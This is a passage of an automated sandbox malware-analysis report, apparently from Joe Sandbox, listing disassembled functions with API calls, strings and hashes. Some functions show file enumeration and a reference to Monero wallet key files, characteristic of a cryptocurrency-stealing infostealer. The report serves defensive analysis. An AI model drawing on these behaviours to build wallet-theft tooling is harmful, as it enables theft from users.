floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B373C
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3775
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B378F
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3892
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B38BB
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3902
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3939
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3970
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B39EF
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3A26
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3AE5
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3E85
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3EBA
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3EE2

Part of subcall function 6C6B6180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6C6B61DD
Part of subcall function 6C6B6180: memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6C6B622C

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B40F9
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B412F
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B4157

Part of subcall function 6C6B6180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C6B6250
Part of subcall function 6C6B6180: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6B6292

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B441B
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B4448
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C6B484E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C6B4863
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C6B4878
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C6B4896
free.MOZGLUE ref: 6C6B489F

Strings

, xrefs: 6C6B4CD2

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: floor$free$malloc$memcpy
String ID:
API String ID: 3842999660-3916222277
Opcode ID: 401fd3e3f0ce69e40bd11e1cc5dbf2f34b948666a2131da8147521809414bbb2
Instruction ID: 58ee6da397fa28b9ce1d1355d0b4e0bc2cd33d329d9bb7f3149907bc63987aa2
Opcode Fuzzy Hash: 401fd3e3f0ce69e40bd11e1cc5dbf2f34b948666a2131da8147521809414bbb2
Instruction Fuzzy Hash: 3CF26C74908B808FC725CF29C08469AFBF1FFCA304F118A5ED99997711DB71A896CB46

Function 6C6664C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C6664DF
GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C6664F2
GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C666505
GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C666518
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C66652B
memcpy.VCRUNTIME140(?,?,?), ref: 6C66671C
GetCurrentProcess.KERNEL32 ref: 6C666724
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C66672F
GetCurrentProcess.KERNEL32 ref: 6C666759
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C666764
VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C666A80
GetSystemInfo.KERNEL32(?), ref: 6C666ABE
__Init_thread_footer.LIBCMT ref: 6C666AD3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C666AE8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C666AF7

Strings

user32.dll, xrefs: 6C666526
nvdxgiwrap.dll, xrefs: 6C666513
nvd3d9wrap.dll, xrefs: 6C666500
_etoured.dll, xrefs: 6C6664ED
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 6C666798
detoured.dll, xrefs: 6C6664DA

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
API String ID: 487479824-2878602165
Opcode ID: e107899b83c6aa657df92b2df7dcac7b44bbfbc6bc99540e755bcd1564052420
Instruction ID: 7cc53657b461bba9e13a34008fa2f976f06660de6afbf4b2ef5565db851e3b8a
Opcode Fuzzy Hash: e107899b83c6aa657df92b2df7dcac7b44bbfbc6bc99540e755bcd1564052420
Instruction Fuzzy Hash: 5CF1E6709052199FDB20CF26DC887DAB7B5AF46318F144299D809E3B41D731EE85CF9A

Function 008A38B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 008A38CC
FindFirstFileA.KERNEL32(?,?), ref: 008A38E3
lstrcat.KERNEL32(?,?), ref: 008A3935
StrCmpCA.SHLWAPI(?,008B0F70), ref: 008A3947
StrCmpCA.SHLWAPI(?,008B0F74), ref: 008A395D
FindNextFileA.KERNEL32(000000FF,?), ref: 008A3C67
FindClose.KERNEL32(000000FF), ref: 008A3C7C

Strings

%s\%s, xrefs: 008A3A6F
%s\%s, xrefs: 008A397A
%s%s, xrefs: 008A3AAD
%s\*, xrefs: 008A38C0
%s\%s\%s, xrefs: 008A3A4A

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
API String ID: 1125553467-2524465048
Opcode ID: 9e3fd9bc4eb03a3a2a800e738b228a88b29c237f3c4d45acf0b061a76ab2a8ee
Instruction ID: 204d7f84e1a4af7b0d8dd1246d230882b87a889584992f7d56d5db6198d18f6f
Opcode Fuzzy Hash: 9e3fd9bc4eb03a3a2a800e738b228a88b29c237f3c4d45acf0b061a76ab2a8ee
Instruction Fuzzy Hash: 86A14FB1A002189BDB24DBA4DC85FFE7378FB59300F084589B51ED6541EB749B85CF62

Function 6C6BC4A0 Relevance: 35.2, APIs: 26, Instructions: 2665COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BC5F9
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BC6FB
memset.VCRUNTIME140(?,00000000,00004008), ref: 6C6BC74D
memset.VCRUNTIME140(?,00000000,00004008), ref: 6C6BC7DE
memset.VCRUNTIME140(?,00000000,00004014), ref: 6C6BC9D5
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BCC76
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C6BCD7A
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BDB40
memcpy.VCRUNTIME140(?,?,?), ref: 6C6BDB62
memcpy.VCRUNTIME140(?,?,?), ref: 6C6BDB99
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BDD8B
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C6BDE95
memcpy.VCRUNTIME140(?,?,?), ref: 6C6BE360
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6BE432
memcpy.VCRUNTIME140(?,?,?), ref: 6C6BE472

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
Instruction ID: 07666fdb95abeea65de448be75d2845b17df2f4a7965e0ad538a7b64aa7667bc
Opcode Fuzzy Hash: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
Instruction Fuzzy Hash: 5733AC71E0021A8FCB04CFA8C8806EDBBF2FF49314F288269D955BB755D731A956CB94

Function 6C67ED10 Relevance: 32.4, APIs: 16, Strings: 2, Instructions: 5407COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6C67EE7A
memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C67EFB5
memcpy.VCRUNTIME140(?,?,?,?), ref: 6C681695
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6816B4
memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6C681770
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C681A3E

Strings

~qel, xrefs: 6C67ED13
~qel, xrefs: 6C67ED10

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memset$freemallocmemcpy
String ID: ~qel$~qel
API String ID: 3693777188-2922831641
Opcode ID: b0d6fbd152e4c27c75d6ad2b320a4be92d76d63439be627fe0f1e3c33d2acc78
Instruction ID: 8fa18b222c337912a8b1ca23478ce27298b3960ccb6cabc63e13a2ac82a5fafa
Opcode Fuzzy Hash: b0d6fbd152e4c27c75d6ad2b320a4be92d76d63439be627fe0f1e3c33d2acc78
Instruction Fuzzy Hash: 13B33971E01219CFCB24CFA8C890ADDB7B2BF49304F2585A9D459AB745D730AD86CFA4

Function 6C66FD00 Relevance: 31.4, APIs: 17, Strings: 3, Instructions: 1360memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C6DE7B8), ref: 6C66FF81
LeaveCriticalSection.KERNEL32(6C6DE7B8), ref: 6C67022D
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6C670240
EnterCriticalSection.KERNEL32(6C6DE768), ref: 6C67025B
LeaveCriticalSection.KERNEL32(6C6DE768), ref: 6C67027B

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C670D67, 6C670D7B, 6C670DAC
MOZ_RELEASE_ASSERT(mNode), xrefs: 6C66FE99, 6C66FEB7, 6C66FED3, 6C670DB8, 6C670DD3, 6C6719B4
<jemalloc>, xrefs: 6C670D62, 6C670D76, 6C670DA7

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_RELEASE_ASSERT(mNode)
API String ID: 618468079-3577267516
Opcode ID: 498597fbc7d55b41ee2c801f08bbf64f5f214a6b7b6fbc0117505a98ef7eea40
Instruction ID: e8992d00596065b3b005aafba80a9a854203beed125ea67ceae0e362e91cc08c
Opcode Fuzzy Hash: 498597fbc7d55b41ee2c801f08bbf64f5f214a6b7b6fbc0117505a98ef7eea40
Instruction Fuzzy Hash: 01C20271A057418FD724CF28C590756BBE1BF85328F28CA6DE4698B7D5C732E801CBA9

Function 008A4570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 008A4580
RtlAllocateHeap.NTDLL(00000000), ref: 008A4587
wsprintfA.USER32 ref: 008A45A6
FindFirstFileA.KERNEL32(?,?), ref: 008A45BD
StrCmpCA.SHLWAPI(?,008B0FC4), ref: 008A45EB
StrCmpCA.SHLWAPI(?,008B0FC8), ref: 008A4601
FindNextFileA.KERNEL32(000000FF,?), ref: 008A468B
FindClose.KERNEL32(000000FF), ref: 008A46A0
lstrcat.KERNEL32(?,0156E590), ref: 008A46C5
lstrcat.KERNEL32(?,0156D558), ref: 008A46D8
lstrlen.KERNEL32(?), ref: 008A46E5
lstrlen.KERNEL32(?), ref: 008A46F6

Strings

%s\%s, xrefs: 008A461B
%s\*, xrefs: 008A459A

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
String ID: %s\%s$%s\*
API String ID: 671575355-2848263008
Opcode ID: b99892fa53ac5a9aae18cf379a5aea81ee687f4675816c3107a660df369c3392
Instruction ID: 45a6ccc14163ca63b7c57266fb3d82948cc07edf0558c1db334a4f1bcbc95c4c
Opcode Fuzzy Hash: b99892fa53ac5a9aae18cf379a5aea81ee687f4675816c3107a660df369c3392
Instruction Fuzzy Hash: 005148B19002189BDB24EBB4DC89FEE737CFB55700F404589B51AD6190EF749B858F92

Function 0089ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0089ED3E
FindFirstFileA.KERNEL32(?,?), ref: 0089ED55
StrCmpCA.SHLWAPI(?,008B1538), ref: 0089EDAB
StrCmpCA.SHLWAPI(?,008B153C), ref: 0089EDC1
FindNextFileA.KERNEL32(000000FF,?), ref: 0089F2AE
FindClose.KERNEL32(000000FF), ref: 0089F2C3

Strings

%s\*.*, xrefs: 0089ED32

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\*.*
API String ID: 180737720-1013718255
Opcode ID: 3244d0d7cd888809b3c844f09739f092a5a5fa195d6a1654d8fdd4d42ab55ff6
Instruction ID: 8c74fd5886300c97489971d866b3ce8a7fd22ac01b1ac71b7eaa02acf6100c80
Opcode Fuzzy Hash: 3244d0d7cd888809b3c844f09739f092a5a5fa195d6a1654d8fdd4d42ab55ff6
Instruction Fuzzy Hash: CCE1C1719111189AEB58FB64DC91AEE7338FF55300F4441A9B50BE2892EF346B8ACF53

Function 6C67D4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C6DE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D4F2
LeaveCriticalSection.KERNEL32(6C6DE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D50B

Part of subcall function 6C65CFE0: EnterCriticalSection.KERNEL32(6C6DE784), ref: 6C65CFF6
Part of subcall function 6C65CFE0: LeaveCriticalSection.KERNEL32(6C6DE784), ref: 6C65D026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D52E
EnterCriticalSection.KERNEL32(6C6DE7DC), ref: 6C67D690
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C67D6A6
LeaveCriticalSection.KERNEL32(6C6DE7DC), ref: 6C67D712
LeaveCriticalSection.KERNEL32(6C6DE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D751
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C67D7EA

Strings

<jemalloc>, xrefs: 6C67D827
: (malloc) Error initializing arena, xrefs: 6C67D82C

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
String ID: : (malloc) Error initializing arena$<jemalloc>
API String ID: 2690322072-3894294050
Opcode ID: 87ce9bd5f3aff67cde588faddb11a27f5e74e8bb6ca9c4638c38cf2c6ce1d661
Instruction ID: 8e5b2784bc4e44ae93db445447a53da21b8530f242c60e12b6fd494aaa9eed1f
Opcode Fuzzy Hash: 87ce9bd5f3aff67cde588faddb11a27f5e74e8bb6ca9c4638c38cf2c6ce1d661
Instruction Fuzzy Hash: 1991C471A047018FD764CF29C49076AB7E1EB89318F158D2EE55AC7B81D734E844CBAA

Function 0089DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON

Download Yara Rule

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,015689F0,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,008B0C2E), ref: 0089DE5E
StrCmpCA.SHLWAPI(?,008B14C8), ref: 0089DEAE
StrCmpCA.SHLWAPI(?,008B14CC), ref: 0089DEC4
FindNextFileA.KERNEL32(000000FF,?), ref: 0089E3E0
FindClose.KERNEL32(000000FF), ref: 0089E3F2

Strings

\*.*, xrefs: 0089DE26

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
